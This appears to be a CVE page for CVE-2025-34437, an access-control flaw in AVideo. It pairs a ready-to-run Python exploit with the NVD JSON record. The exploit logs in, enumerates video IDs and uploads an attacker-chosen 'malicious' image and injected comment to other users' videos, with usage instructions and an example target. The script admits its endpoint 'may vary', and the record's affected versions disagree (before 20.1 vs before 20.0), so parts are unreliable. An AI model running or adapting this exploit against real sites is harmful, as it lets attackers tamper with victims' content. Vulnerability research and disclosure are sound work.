CVE-2025-34437

import requests import json import sys # CVE-2025-34437 PoC - AVideo IDOR Arbitrary Comment Image Upload # This PoC demonstrates uploading a comment image to a victim video class AVideoExploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.logged_in = False def login(self): """Authenticate to AVideo platform""" login_url = f"{self.target_url}/?login" data = { 'user': self.username, 'pass': self.password } try: response = self.session.post(login_url, data=data, timeout=10) if response.status_code == 200: self.logged_in = True print(f"[+] Successfully logged in as {self.username}") return True except Exception as e: print(f"[-] Login failed: {e}") return False def upload_comment_image(self, video_id, image_path): """ Exploit IDOR vulnerability to upload comment image to arbitrary video video_id: Target video ID (victim's video) image_path: Path to malicious image file """ if not self.logged_in: print("[-] Not logged in. Please login first.") return False # API endpoint for comment image upload (may vary) upload_url = f"{self.target_url}/objects/videoCommentAdd.json.php" try: with open(image_path, 'rb') as f: files = { 'file': ('malicious.png', f, 'image/png') } data = { 'videos_id': video_id, # IDOR: No ownership check 'comment': 'Injected comment via IDOR' } response = self.session.post(upload_url, data=data, files=files, timeout=10) if response.status_code == 200: result = response.json() if result.get('status'): print(f"[+] Successfully uploaded image to video ID: {video_id}") print(f"[+] Comment ID: {result.get('comment_id', 'N/A')}") return True else: print(f"[-] Upload failed: {result.get('msg', 'Unknown error')}") except FileNotFoundError: print(f"[-] Image file not found: {image_path}") except Exception as e: print(f"[-] Upload failed: {e}") return False def enumerate_videos(self, limit=10): """Enumerate accessible video IDs""" api_url = f"{self.target_url}/objects/videos.json.php" try: response = self.session.get(api_url, params={'page': 1, 'limit': limit}, timeout=10) if response.status_code == 200: data = response.json() videos = data.get('videos', []) print(f"[+] Found {len(videos)} videos") return [v.get('id') for v in videos] except Exception as e: print(f"[-] Enumeration failed: {e}") return [] def main(): if len(sys.argv) < 5: print("Usage: python cve-2025-34437.py <target_url> <username> <password> <video_id> <image_path>") print("Example: python cve-2025-34437.py http://target.com user pass 123 malicious.png") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] video_id = sys.argv[4] image_path = sys.argv[5] exploit = AVideoExploit(target, username, password) if exploit.login(): print(f"[*] Exploiting IDOR vulnerability on video ID: {video_id}") exploit.upload_comment_image(video_id, image_path) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-34437", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.150", "lastModified": "2025-12-19T19:15:51.223", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 permit any authenticated user to upload comment images to videos owned by other users. The endpoint validates authentication but omits ownership checks, allowing attackers to perform unauthorized uploads to arbitrary video objects."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/d411f91805", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-comment-image-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}